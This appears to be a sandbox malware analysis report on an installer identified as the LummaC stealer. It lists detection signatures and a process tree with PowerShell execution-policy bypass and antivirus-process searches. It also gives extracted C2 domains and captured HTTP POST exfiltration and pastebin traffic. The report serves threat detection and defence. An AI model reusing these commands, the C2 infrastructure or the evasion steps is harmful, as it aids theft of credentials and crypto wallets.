Edit tour

Windows Analysis Report
Full-Setup.exe

Overview

General Information

Sample name:	Full-Setup.exe
Analysis ID:	1579282
MD5:	8f260f06588b4b171caa42f66929d9a6
SHA1:	c3632bec197bf268b7ee2cd7a709691f8a35a61a
SHA256:	a8d6e59a8f43bdcfad4de075ebc483aeda53c0ebbc59332d84663591adaeaa03
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Drops PE files with a suspicious file extension

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Full-Setup.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\Full-Setup.exe" MD5: 8F260F06588B4B171CAA42F66929D9A6)

cmd.exe (PID: 7364 cmdline: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7424 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7432 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7468 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7476 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7512 cmdline: cmd /c md 600044 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7536 cmdline: findstr /V "Mary" Exploring MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7552 cmdline: cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention k MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Glow.com (PID: 7576 cmdline: Glow.com k MD5: 62D09F076E6E0240548C2F837536A46A)

powershell.exe (PID: 8088 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7592 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["deafeninggeh.biz", "immureprech.biz", "diffuculttan.xyz", "effecterectz.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "debonairnukk.xyz", "kitteprincv.click"], "Build id": "eHdy4--p"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Glow.com k, ParentImage: C:\Users\user\AppData\Local\Temp\600044\Glow.com, ParentProcessId: 7576, ParentProcessName: Glow.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", ProcessId: 8088, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Glow.com k, ParentImage: C:\Users\user\AppData\Local\Temp\600044\Glow.com, ParentProcessId: 7576, ParentProcessName: Glow.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", ProcessId: 8088, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Glow.com k, ParentImage: C:\Users\user\AppData\Local\Temp\600044\Glow.com, ParentProcessId: 7576, ParentProcessName: Glow.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", ProcessId: 8088, ProcessName: powershell.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Full-Setup.exe", ParentImage: C:\Users\user\Desktop\Full-Setup.exe, ParentProcessId: 7312, ParentProcessName: Full-Setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd, ProcessId: 7364, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Glow.com k, ParentImage: C:\Users\user\AppData\Local\Temp\600044\Glow.com, ParentProcessId: 7576, ParentProcessName: Glow.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", ProcessId: 8088, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7364, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7476, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:02:07.212650+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.43.127	443	TCP
2024-12-21T13:02:09.519860+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.43.127	443	TCP
2024-12-21T13:02:11.827348+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.43.127	443	TCP
2024-12-21T13:02:14.357082+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.43.127	443	TCP
2024-12-21T13:02:16.534303+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.43.127	443	TCP
2024-12-21T13:02:19.211420+0100	2028371	3	Unknown Traffic	192.168.2.4	49750	104.21.43.127	443	TCP
2024-12-21T13:02:21.642694+0100	2028371	3	Unknown Traffic	192.168.2.4	49756	104.21.43.127	443	TCP
2024-12-21T13:02:25.113484+0100	2028371	3	Unknown Traffic	192.168.2.4	49767	104.21.43.127	443	TCP
2024-12-21T13:02:27.255557+0100	2028371	3	Unknown Traffic	192.168.2.4	49773	104.26.3.16	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:02:08.245697+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.43.127	443	TCP
2024-12-21T13:02:10.293340+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49739	104.21.43.127	443	TCP
2024-12-21T13:02:25.896219+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49767	104.21.43.127	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:02:08.245697+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49738	104.21.43.127	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:02:10.293340+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49739	104.21.43.127	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-21T13:02:19.966107+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.43.127	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "immureprech.biz", "diffuculttan.xyz", "effecterectz.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "debonairnukk.xyz", "kitteprincv.click"], "Build id": "eHdy4--p"}

Multi AV Scanner detection for submitted file

Source: Full-Setup.exe	Virustotal: Detection: 59%			Perma Link
Source: Full-Setup.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 91.9% probability

Sample uses string decryption to hide its real strings

Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: sordid-snaked.cyou
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: awake-weaves.cyou
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: wrathful-jammy.cyou
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: debonairnukk.xyz
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: diffuculttan.xyz
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: effecterectz.xyz
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: deafeninggeh.biz
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: immureprech.biz
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: kitteprincv.click
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String decryptor: eHdy4--p

Source: Full-Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49773 version: TLS 1.2

Source: Full-Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\Full-Setup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003EDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_003EDC54
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003FA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_003FA087
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003FA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_003FA1E2
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003EE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	10_2_003EE472
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003FA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	10_2_003FA570
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003BC622 FindFirstFileExW,	10_2_003BC622
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003F66DC FindFirstFileW,FindNextFileW,FindClose,	10_2_003F66DC
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003F7333 FindFirstFileW,FindClose,	10_2_003F7333
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003F73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	10_2_003F73D4
Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com	Code function: 10_2_003ED921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_003ED921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\600044	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\600044\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49750 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 104.21.43.127:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: kitteprincv.click

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Source: Joe Sandbox View

IP Address: 104.26.3.16 104.26.3.16

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.43.127:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 104.26.3.16:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: kitteprincv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: kitteprincv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OCX7VZAWZQ7KITFAT1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18166Host: kitteprincv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3OQHAZ4VLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8733Host: kitteprincv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V7Y3TEP1KG1POUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20410Host: kitteprincv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O6H956YO93QCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: kitteprincv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UZIPRQST3O1RGOF8RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 553517Host: kitteprincv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: kitteprincv.click
Source: global traffic	HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com

Code function: 10_2_003FD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

10_2_003FD889

Source: global traffic

HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co

Source: global traffic	DNS traffic detected: DNS query: xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHugg
Source: global traffic	DNS traffic detected: DNS query: kitteprincv.click
Source: global traffic	DNS traffic detected: DNS query: rentry.co

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: kitteprincv.click

Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
